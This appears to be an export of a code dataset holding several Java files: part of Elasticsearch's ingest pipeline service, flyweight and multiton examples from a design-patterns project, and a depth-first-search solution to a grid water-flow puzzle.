PipelineSlot defaultPipelineSlot = null, finalPipelineSlot = null;
if (defaultPipeline != null) {
defaultPipelineSlot = new PipelineSlot(defaultPipeline, getPipeline(defaultPipeline), false);
}
if (finalPipeline != null) {
finalPipelineSlot = new PipelineSlot(finalPipeline, getPipeline(finalPipeline), true);
}
if (defaultPipeline != null && finalPipeline != null) {
return List.of(defaultPipelineSlot, finalPipelineSlot).iterator();
} else if (finalPipeline != null) {
return List.of(finalPipelineSlot).iterator();
} else if (defaultPipeline != null) {
return List.of(defaultPipelineSlot).iterator();
} else {
return Collections.emptyIterator();
}
}
@Override
public boolean hasNext() {
return pipelineSlotIterator.hasNext();
}
@Override
public PipelineSlot next() {
return pipelineSlotIterator.next();
}
}
private void executePipelines(
final PipelineIterator pipelines,
final IndexRequest indexRequest,
final IngestDocument ingestDocument,
final Predicate<String> shouldStoreFailure,
final ActionListener<IngestPipelinesExecutionResult> listener
) {
assert pipelines.hasNext();
PipelineSlot slot = pipelines.next();
final String pipelineId = slot.id();
final Pipeline pipeline = slot.pipeline();
final boolean isFinalPipeline = slot.isFinal();
// reset the reroute flag, at the start of a new pipeline execution this document hasn't been rerouted yet
ingestDocument.resetReroute();
final String originalIndex = indexRequest.indices()[0];
final Consumer<Exception> exceptionHandler = (Exception e) -> {
if (shouldStoreFailure.test(originalIndex)) {
listener.onResponse(IngestPipelinesExecutionResult.failAndStoreFor(originalIndex, e));
} else {
listener.onFailure(e);
}
};
try {
if (pipeline == null) {
throw new IllegalArgumentException("pipeline with id [" + pipelineId + "] does not exist");
}
indexRequest.addPipeline(pipelineId);
executePipeline(ingestDocument, pipeline, (keep, e) -> {
assert keep != null;
if (e != null) {
logger.debug(
() -> format(
"failed to execute pipeline [%s] for document [%s/%s]",
pipelineId,
indexRequest.index(),
indexRequest.id()
),
e
);
exceptionHandler.accept(e);
return; // document failed!
}
if (keep == false) {
listener.onResponse(IngestPipelinesExecutionResult.DISCARD_RESULT);
return; // document dropped!
}
// update the index request so that we can execute additional pipelines (if any), etc
updateIndexRequestMetadata(indexRequest, ingestDocument.getMetadata());
try {
// check for self-references if necessary, (i.e. if a script processor has run), and clear the bit
if (ingestDocument.doNoSelfReferencesCheck()) {
CollectionUtils.ensureNoSelfReferences(ingestDocument.getSource(), null);
ingestDocument.doNoSelfReferencesCheck(false);
}
} catch (IllegalArgumentException ex) {
// An IllegalArgumentException can be thrown when an ingest processor creates a source map that is self-referencing.
// In that case, we catch and wrap the exception, so we can include more details
exceptionHandler.accept(
new IllegalArgumentException(
format(
"Failed to generate the source document for ingest pipeline [%s] for document [%s/%s]",
pipelineId,
indexRequest.index(),
indexRequest.id()
),
ex
)
);
return; // document failed!
}
PipelineIterator newPipelines = pipelines;
final String newIndex = indexRequest.indices()[0];
if (Objects.equals(originalIndex, newIndex) == false) {
// final pipelines cannot change the target index (either directly or by way of a reroute)
if (isFinalPipeline) {
exceptionHandler.accept(
new IllegalStateException(
format(
"final pipeline [%s] can't change the target index (from [%s] to [%s]) for document [%s]",
pipelineId,
originalIndex,
newIndex,
indexRequest.id()
)
)
);
return; // document failed!
}
// add the index to the document's index history, and check for cycles in the visited indices
boolean cycle = ingestDocument.updateIndexHistory(newIndex) == false;
if (cycle) {
List<String> indexCycle = new ArrayList<>(ingestDocument.getIndexHistory());
indexCycle.add(newIndex);
exceptionHandler.accept(
new IllegalStateException(
format(
"index cycle detected while processing pipeline [%s] for document [%s]: %s",
pipelineId,
indexRequest.id(),
indexCycle
)
)
);
return; // document failed!
}
// clear the current pipeline, then re-resolve the pipelines for this request
indexRequest.setPipeline(null);
indexRequest.isPipelineResolved(false);
resolvePipelinesAndUpdateIndexRequest(null, indexRequest, state.metadata());
newPipelines = getAndResetPipelines(indexRequest);
// for backwards compatibility, when a pipeline changes the target index for a document without using the reroute
// mechanism, do not invoke the default pipeline of the new target index
if (ingestDocument.isReroute() == false) {
newPipelines = newPipelines.withoutDefaultPipeline();
}
}
if (newPipelines.hasNext()) {
executePipelines(newPipelines, indexRequest, ingestDocument, shouldStoreFailure, listener);
} else {
// update the index request's source and (potentially) cache the timestamp for TSDB
updateIndexRequestSource(indexRequest, ingestDocument);
cacheRawTimestamp(indexRequest, ingestDocument);
listener.onResponse(IngestPipelinesExecutionResult.SUCCESSFUL_RESULT); // document succeeded!
}
});
} catch (Exception e) {
logger.debug(
() -> format("failed to execute pipeline [%s] for document [%s/%s]", pipelineId, indexRequest.index(), indexRequest.id()),
e
);
exceptionHandler.accept(e); // document failed
}
}
private static void executePipeline(
final IngestDocument ingestDocument,
final Pipeline pipeline,
final BiConsumer<Boolean, Exception> handler
) {
// adapt our {@code BiConsumer<Boolean, Exception>} handler shape to the
// {@code BiConsumer<IngestDocument, Exception>} handler shape used internally
// by ingest pipelines and processors
ingestDocument.executePipeline(pipeline, (result, e) -> {
if (e != null) {
handler.accept(true, e);
} else {
handler.accept(result != null, null);
}
});
}
public IngestStats stats() {
IngestStats.Builder statsBuilder = new IngestStats.Builder();
statsBuilder.addTotalMetrics(totalMetrics);
pipelines.forEach((id, holder) -> {
Pipeline pipeline = holder.pipeline;
CompoundProcessor rootProcessor = pipeline.getCompoundProcessor();
statsBuilder.addPipelineMetrics(id, pipeline.getMetrics());
List<Tuple<Processor, IngestMetric>> processorMetrics = new ArrayList<>();
collectProcessorMetrics(rootProcessor, processorMetrics);
processorMetrics.forEach(t -> {
Processor processor = t.v1();
IngestMetric processorMetric = t.v2();
statsBuilder.addProcessorMetrics(id, getProcessorName(processor), processor.getType(), processorMetric);
});
});
return statsBuilder.build();
}
/**
* Adds a listener that gets invoked with the current cluster state before processor factories
* get invoked.
* <p>
* This is useful for components that are used by ingest processors, so that they have the opportunity to update
* before these components get used by the ingest processor factory.
*/
public void addIngestClusterStateListener(Consumer<ClusterState> listener) {
ingestClusterStateListeners.add(listener);
}
// package private for testing
static String getProcessorName(Processor processor) {
// conditionals are implemented as wrappers around the real processor, so get the real processor for the correct type for the name
if (processor instanceof ConditionalProcessor conditionalProcessor) {
processor = conditionalProcessor.getInnerProcessor();
}
StringBuilder sb = new StringBuilder(5);
sb.append(processor.getType());
if (processor instanceof PipelineProcessor pipelineProcessor) {
String pipelineName = pipelineProcessor.getPipelineTemplate().newInstance(Map.of()).execute();
sb.append(":");
sb.append(pipelineName);
}
String tag = processor.getTag();
if (tag != null && tag.isEmpty() == false) {
sb.append(":");
sb.append(tag);
}
return sb.toString();
}
/**
* Builds a new ingest document from the passed-in index request.
*/
private static IngestDocument newIngestDocument(final IndexRequest request, DocumentSizeObserver documentSizeObserver) {
return new IngestDocument(
request.index(),
request.id(),
request.version(),
request.routing(),
request.versionType(),
request.sourceAsMap(documentSizeObserver)
);
}
/**
* Updates an index request based on the metadata of an ingest document.
*/
private static void updateIndexRequestMetadata(final IndexRequest request, final org.elasticsearch.script.Metadata metadata) {
// it's fine to set all metadata fields all the time, as ingest document holds their starting values
// before ingestion, which might also get modified during ingestion.
request.index(metadata.getIndex());
request.id(metadata.getId());
request.routing(metadata.getRouting());
request.version(metadata.getVersion());
if (metadata.getVersionType() != null) {
request.versionType(VersionType.fromString(metadata.getVersionType()));
}
Number number;
if ((number = metadata.getIfSeqNo()) != null) {
request.setIfSeqNo(number.longValue());
}
if ((number = metadata.getIfPrimaryTerm()) != null) {
request.setIfPrimaryTerm(number.longValue());
}
Map<String, String> map;
if ((map = metadata.getDynamicTemplates()) != null) {
Map<String, String> mergedDynamicTemplates = new HashMap<>(request.getDynamicTemplates());
mergedDynamicTemplates.putAll(map);
request.setDynamicTemplates(mergedDynamicTemplates);
}
}
/**
* Updates an index request based on the source of an ingest document, guarding against self-references if necessary.
*/
private static void updateIndexRequestSource(final IndexRequest request, final IngestDocument document) {
boolean ensureNoSelfReferences = document.doNoSelfReferencesCheck();
// we already check for self references elsewhere (and clear the bit), so this should always be false,
// keeping the check and assert as a guard against extraordinarily surprising circumstances
assert ensureNoSelfReferences == false;
request.source(document.getSource(), request.getContentType(), ensureNoSelfReferences);
}
/**
* Grab the @timestamp and store it on the index request so that TSDB can use it without needing to parse
* the source for this document.
*/
private static void cacheRawTimestamp(final IndexRequest request, final IngestDocument document) {
if (request.getRawTimestamp() == null) {
// cache the @timestamp from the ingest document's source map if there is one
Object rawTimestamp = document.getSource().get(DataStream.TIMESTAMP_FIELD_NAME);
if (rawTimestamp != null) {
request.setRawTimestamp(rawTimestamp);
}
}
}
@Override
public void applyClusterState(final ClusterChangedEvent event) {
state = event.state();
if (state.blocks().hasGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK)) {
return;
}
// Publish cluster state to components that are used by processor factories before letting
// processor factories create new processor instances.
// (Note that this needs to be done also in the case when there is no change to ingest metadata, because in the case
// when only the part of the cluster state that a component is interested in, is updated.)
ingestClusterStateListeners.forEach(consumer -> consumer.accept(state));
IngestMetadata newIngestMetadata = state.getMetadata().custom(IngestMetadata.TYPE);
if (newIngestMetadata == null) {
return;
}
try {
innerUpdatePipelines(newIngestMetadata);
} catch (ElasticsearchParseException e) {
logger.warn("failed to update ingest pipelines", e);
}
}
synchronized void innerUpdatePipelines(IngestMetadata newIngestMetadata) {
Map<String, PipelineHolder> existingPipelines = this.pipelines;
// Lazy initialize these variables in order to favour the most like scenario that there are no pipeline changes:
Map<String, PipelineHolder> newPipelines = null;
List<ElasticsearchParseException> exceptions = null;
// Iterate over pipeline configurations in ingest metadata and constructs a new pipeline if there is no pipeline
// or the pipeline configuration has been modified
for (PipelineConfiguration newConfiguration : newIngestMetadata.getPipelines().values()) {
PipelineHolder previous = existingPipelines.get(newConfiguration.getId());
if (previous != null && previous.configuration.equals(newConfiguration)) {
continue;
}
if (newPipelines == null) {
newPipelines = new HashMap<>(existingPipelines);
}
try {
Pipeline newPipeline = Pipeline.create(
newConfiguration.getId(),
newConfiguration.getConfigAsMap(),
processorFactories,
scriptService
);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, newPipeline));
if (previous == null) {
continue;
}
Pipeline oldPipeline = previous.pipeline;
newPipeline.getMetrics().add(oldPipeline.getMetrics());
List<Tuple<Processor, IngestMetric>> oldPerProcessMetrics = new ArrayList<>();
List<Tuple<Processor, IngestMetric>> newPerProcessMetrics = new ArrayList<>();
collectProcessorMetrics(oldPipeline.getCompoundProcessor(), oldPerProcessMetrics);
collectProcessorMetrics(newPipeline.getCompoundProcessor(), newPerProcessMetrics);
// Best attempt to populate new processor metrics using a parallel array of the old metrics. This is not ideal since
// the per processor metrics may get reset when the arrays don't match. However, to get to an ideal model, unique and
// consistent id's per processor and/or semantic equals for each processor will be needed.
if (newPerProcessMetrics.size() == oldPerProcessMetrics.size()) {
Iterator<Tuple<Processor, IngestMetric>> oldMetricsIterator = oldPerProcessMetrics.iterator();
for (Tuple<Processor, IngestMetric> compositeMetric : newPerProcessMetrics) {
String type = compositeMetric.v1().getType();
IngestMetric metric = compositeMetric.v2();
if (oldMetricsIterator.hasNext()) {
Tuple<Processor, IngestMetric> oldCompositeMetric = oldMetricsIterator.next();
String oldType = oldCompositeMetric.v1().getType();
IngestMetric oldMetric = oldCompositeMetric.v2();
if (type.equals(oldType)) {
metric.add(oldMetric);
}
}
}
}
} catch (ElasticsearchParseException e) {
Pipeline pipeline = substitutePipeline(newConfiguration.getId(), e);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, pipeline));
if (exceptions == null) {
exceptions = new ArrayList<>();
}
exceptions.add(e);
} catch (Exception e) {
ElasticsearchParseException parseException = new ElasticsearchParseException(
"Error updating pipeline with id [" + newConfiguration.getId() + "]",
e
);
Pipeline pipeline = substitutePipeline(newConfiguration.getId(), parseException);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, pipeline));
if (exceptions == null) {
exceptions = new ArrayList<>();
}
exceptions.add(parseException);
}
}
// Iterate over the current active pipelines and check whether they are missing in the pipeline configuration and
// if so delete the pipeline from new Pipelines map:
for (Map.Entry<String, PipelineHolder> entry : existingPipelines.entrySet()) {
if (newIngestMetadata.getPipelines().get(entry.getKey()) == null) {
if (newPipelines == null) {
newPipelines = new HashMap<>(existingPipelines);
}
newPipelines.remove(entry.getKey());
}
}
if (newPipelines != null) {
// Update the pipelines:
this.pipelines = Map.copyOf(newPipelines);
// Rethrow errors that may have occurred during creating new pipeline instances:
if (exceptions != null) {
ExceptionsHelper.rethrowAndSuppress(exceptions);
}
}
}
/**
* Gets all the Processors of the given type from within a Pipeline.
* @param pipelineId the pipeline to inspect
* @param clazz the Processor class to look for
* @return True if the pipeline contains an instance of the Processor class passed in
*/
public <P extends Processor> List<P> getProcessorsInPipeline(String pipelineId, Class<P> clazz) {
Pipeline pipeline = getPipeline(pipelineId);
if (pipeline == null) {
throw new IllegalArgumentException("pipeline with id [" + pipelineId + "] does not exist");
}
List<P> processors = new ArrayList<>();
for (Processor processor : pipeline.flattenAllProcessors()) {
if (clazz.isAssignableFrom(processor.getClass())) {
processors.add(clazz.cast(processor));
}
while (processor instanceof WrappingProcessor wrappingProcessor) {
if (clazz.isAssignableFrom(wrappingProcessor.getInnerProcessor().getClass())) {
processors.add(clazz.cast(wrappingProcessor.getInnerProcessor()));
}
processor = wrappingProcessor.getInnerProcessor();
// break in the case of self referencing processors in the event a processor author creates a
// wrapping processor that has its inner processor refer to itself.
if (wrappingProcessor == processor) {
break;
}
}
}
return processors;
}
public <P extends Processor> Collection<String> getPipelineWithProcessorType(Class<P> clazz, Predicate<P> predicate) {
List<String> matchedPipelines = new LinkedList<>();
for (PipelineHolder holder : pipelines.values()) {
String pipelineId = holder.pipeline.getId();
List<P> processors = getProcessorsInPipeline(pipelineId, clazz);
if (processors.isEmpty() == false && processors.stream().anyMatch(predicate)) {
matchedPipelines.add(pipelineId);
}
}
return matchedPipelines;
}
public synchronized void reloadPipeline(String id) throws Exception {
PipelineHolder holder = pipelines.get(id);
Pipeline updatedPipeline = Pipeline.create(id, holder.configuration.getConfigAsMap(), processorFactories, scriptService);
Map<String, PipelineHolder> updatedPipelines = new HashMap<>(this.pipelines);
updatedPipelines.put(id, new PipelineHolder(holder.configuration, updatedPipeline));
this.pipelines = Map.copyOf(updatedPipelines);
}
private static Pipeline substitutePipeline(String id, ElasticsearchParseException e) {
String tag = e.getHeaderKeys().contains("processor_tag") ? e.getHeader("processor_tag").get(0) : null;
String type = e.getHeaderKeys().contains("processor_type") ? e.getHeader("processor_type").get(0) : "unknown";
String errorMessage = "pipeline with id [" + id + "] could not be loaded, caused by [" + e.getDetailedMessage() + "]";
Processor failureProcessor = new AbstractProcessor(tag, "this is a placeholder processor") {
@Override
public IngestDocument execute(IngestDocument ingestDocument) {
throw new IllegalStateException(errorMessage);
}
@Override
public String getType() {
return type;
}
};
String description = "this is a place holder pipeline, because pipeline with id [" + id + "] could not be loaded";
return new Pipeline(id, description, null, null, new CompoundProcessor(failureProcessor));
}
record PipelineHolder(PipelineConfiguration configuration, Pipeline pipeline) {
public PipelineHolder {
Objects.requireNonNull(configuration);
Objects.requireNonNull(pipeline);
}
}
private static Optional<Pipelines> resolvePipelinesFromMetadata(
DocWriteRequest<?> originalRequest,
IndexRequest indexRequest,
Metadata metadata,
long epochMillis
) {
IndexMetadata indexMetadata = null;
// start to look for default or final pipelines via settings found in the cluster metadata
if (originalRequest != null) {
indexMetadata = metadata.indices()
.get(IndexNameExpressionResolver.resolveDateMathExpression(originalRequest.index(), epochMillis));
}
// check the alias for the index request (this is how normal index requests are modeled)
if (indexMetadata == null && indexRequest.index() != null) {
IndexAbstraction indexAbstraction = metadata.getIndicesLookup().get(indexRequest.index());
if (indexAbstraction != null && indexAbstraction.getWriteIndex() != null) {
indexMetadata = metadata.index(indexAbstraction.getWriteIndex());
}
}
// check the alias for the action request (this is how upserts are modeled)
if (indexMetadata == null && originalRequest != null && originalRequest.index() != null) {
IndexAbstraction indexAbstraction = metadata.getIndicesLookup().get(originalRequest.index());
if (indexAbstraction != null && indexAbstraction.getWriteIndex() != null) {
indexMetadata = metadata.index(indexAbstraction.getWriteIndex());
}
}
if (indexMetadata == null) {
return Optional.empty();
}
final Settings settings = indexMetadata.getSettings();
return Optional.of(new Pipelines(IndexSettings.DEFAULT_PIPELINE.get(settings), IndexSettings.FINAL_PIPELINE.get(settings)));
}
private static Optional<Pipelines> resolvePipelinesFromIndexTemplates(IndexRequest indexRequest, Metadata metadata) {
if (indexRequest.index() == null) {
return Optional.empty();
}
// the index does not exist yet (and this is a valid request), so match index
// templates to look for pipelines in either a matching V2 template (which takes
// precedence), or if a V2 template does not match, any V1 templates
String v2Template = MetadataIndexTemplateService.findV2Template(metadata, indexRequest.index(), false);
if (v2Template != null) {
final Settings settings = MetadataIndexTemplateService.resolveSettings(metadata, v2Template);
return Optional.of(new Pipelines(IndexSettings.DEFAULT_PIPELINE.get(settings), IndexSettings.FINAL_PIPELINE.get(settings)));
}
String defaultPipeline = null;
String finalPipeline = null;
List<IndexTemplateMetadata> templates = MetadataIndexTemplateService.findV1Templates(metadata, indexRequest.index(), null);
// order of templates are the highest order first
for (final IndexTemplateMetadata template : templates) {
final Settings settings = template.settings();
// note: the exists/get trickiness here is because we explicitly *don't* want the default value
// of the settings -- a non-null value would terminate the search too soon
if (defaultPipeline == null && IndexSettings.DEFAULT_PIPELINE.exists(settings)) {
defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(settings);
// we can not break in case a lower-order template has a final pipeline that we need to collect
}
if (finalPipeline == null && IndexSettings.FINAL_PIPELINE.exists(settings)) {
finalPipeline = IndexSettings.FINAL_PIPELINE.get(settings);
// we can not break in case a lower-order template has a default pipeline that we need to collect
}
if (defaultPipeline != null && finalPipeline != null) {
// we can break if we have already collected a default and final pipeline
break;
}
}
// having exhausted the search, if nothing was found, then use the default noop pipeline names
defaultPipeline = Objects.requireNonNullElse(defaultPipeline, NOOP_PIPELINE_NAME);
finalPipeline = Objects.requireNonNullElse(finalPipeline, NOOP_PIPELINE_NAME);
return Optional.of(new Pipelines(defaultPipeline, finalPipeline));
}
/**
* Checks whether an IndexRequest has at least one pipeline defined.
* <p>
* This method assumes that the pipelines are beforehand resolved.
*/
public static boolean hasPipeline(IndexRequest indexRequest) {
assert indexRequest.isPipelineResolved();
assert indexRequest.getPipeline() != null;
assert indexRequest.getFinalPipeline() != null;
return NOOP_PIPELINE_NAME.equals(indexRequest.getPipeline()) == false
|| NOOP_PIPELINE_NAME.equals(indexRequest.getFinalPipeline()) == false;
}
private record Pipelines(String defaultPipeline, String finalPipeline) {
private static final Pipelines NO_PIPELINES_DEFINED = new Pipelines(NOOP_PIPELINE_NAME, NOOP_PIPELINE_NAME);
public Pipelines {
Objects.requireNonNull(defaultPipeline);
Objects.requireNonNull(finalPipeline);
}
}
}
| DaveCTurner/elasticsearch | server/src/main/java/org/elasticsearch/ingest/IngestService.java |
1,025 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import lombok.extern.slf4j.Slf4j;
/**
* HolyWaterPotion.
*/
@Slf4j
public class HolyWaterPotion implements Potion {
@Override
public void drink() {
LOGGER.info("You feel blessed. (Potion={})", System.identityHashCode(this));
}
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/HolyWaterPotion.java |
1,033 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
/**
* Enumeration for potion types.
*/
public enum PotionType {
HEALING, INVISIBILITY, STRENGTH, HOLY_WATER, POISON
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/PotionType.java |
1,034 | // Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
// Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
// Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
// Note:
// The order of returned grid coordinates does not matter.
// Both m and n are less than 150.
// Example:
// Given the following 5x5 matrix:
// Pacific ~ ~ ~ ~ ~
// ~ 1 2 2 3 (5) *
// ~ 3 2 3 (4) (4) *
// ~ 2 4 (5) 3 1 *
// ~ (6) (7) 1 4 5 *
// ~ (5) 1 1 2 4 *
// * * * * * Atlantic
// Return:
// [[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in above matrix).
public class PacificAtlanticWaterFlow {
public List<int[]> pacificAtlantic(int[][] matrix) {
List<int[]> result = new LinkedList<>();
//error checking
if(matrix == null || matrix.length == 0 || matrix[0].length == 0) {
return result;
}
int n = matrix.length;
int m = matrix[0].length;
boolean[][] pacific = new boolean[n][m];
boolean[][] atlantic = new boolean[n][m];
for(int i = 0; i < n; i++) {
dfs(matrix, pacific, Integer.MIN_VALUE, i, 0);
dfs(matrix, atlantic, Integer.MIN_VALUE, i, m - 1);
}
for(int i = 0; i < m; i++) {
dfs(matrix, pacific, Integer.MIN_VALUE, 0, i);
dfs(matrix, atlantic, Integer.MIN_VALUE, n - 1, i);
}
for(int i = 0; i < n; i++) {
for(int j = 0; j < m; j++) {
if(pacific[i][j] && atlantic[i][j]) {
result.add(new int[] {i, j});
}
}
}
return result;
}
public void dfs(int[][] matrix, boolean[][] visited, int height, int x, int y) {
int n = matrix.length;
int m = matrix[0].length;
if(x < 0 || x >= n || y < 0 || y >= m || visited[x][y] || matrix[x][y] < height) {
return;
}
visited[x][y] = true;
dfs(matrix, visited, matrix[x][y], x + 1, y);
dfs(matrix, visited, matrix[x][y], x - 1, y);
dfs(matrix, visited, matrix[x][y], x, y + 1);
dfs(matrix, visited, matrix[x][y], x, y - 1);
}
}
| kdn251/interviews | company/google/PacificAtlanticWaterFlow.java |
1,041 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* AlchemistShop holds potions on its shelves. It uses PotionFactory to provide the potions.
*/
@Slf4j
public class AlchemistShop {
private final List<Potion> topShelf;
private final List<Potion> bottomShelf;
/**
* Constructor.
*/
public AlchemistShop() {
var factory = new PotionFactory();
topShelf = List.of(
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.STRENGTH),
factory.createPotion(PotionType.HEALING),
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.STRENGTH),
factory.createPotion(PotionType.HEALING),
factory.createPotion(PotionType.HEALING)
);
bottomShelf = List.of(
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.HOLY_WATER),
factory.createPotion(PotionType.HOLY_WATER)
);
}
/**
* Get a read-only list of all the items on the top shelf.
*
* @return The top shelf potions
*/
public final List<Potion> getTopShelf() {
return List.copyOf(this.topShelf);
}
/**
* Get a read-only list of all the items on the bottom shelf.
*
* @return The bottom shelf potions
*/
public final List<Potion> getBottomShelf() {
return List.copyOf(this.bottomShelf);
}
/**
* Drink all the potions.
*/
public void drinkPotions() {
LOGGER.info("Drinking top shelf potions");
topShelf.forEach(Potion::drink);
LOGGER.info("Drinking bottom shelf potions");
bottomShelf.forEach(Potion::drink);
}
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/AlchemistShop.java |
1,047 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.multiton;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import lombok.Getter;
/**
* Nazgul is a Multiton class. Nazgul instances can be queried using {@link #getInstance} method.
*/
public final class Nazgul {
private static final Map<NazgulName, Nazgul> nazguls;
@Getter
private final NazgulName name;
static {
nazguls = new ConcurrentHashMap<>();
nazguls.put(NazgulName.KHAMUL, new Nazgul(NazgulName.KHAMUL));
nazguls.put(NazgulName.MURAZOR, new Nazgul(NazgulName.MURAZOR));
nazguls.put(NazgulName.DWAR, new Nazgul(NazgulName.DWAR));
nazguls.put(NazgulName.JI_INDUR, new Nazgul(NazgulName.JI_INDUR));
nazguls.put(NazgulName.AKHORAHIL, new Nazgul(NazgulName.AKHORAHIL));
nazguls.put(NazgulName.HOARMURATH, new Nazgul(NazgulName.HOARMURATH));
nazguls.put(NazgulName.ADUNAPHEL, new Nazgul(NazgulName.ADUNAPHEL));
nazguls.put(NazgulName.REN, new Nazgul(NazgulName.REN));
nazguls.put(NazgulName.UVATHA, new Nazgul(NazgulName.UVATHA));
}
private Nazgul(NazgulName name) {
this.name = name;
}
public static Nazgul getInstance(NazgulName name) {
return nazguls.get(name);
}
}
| iluwatar/java-design-patterns | multiton/src/main/java/com/iluwatar/multiton/Nazgul.java |
1,057 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
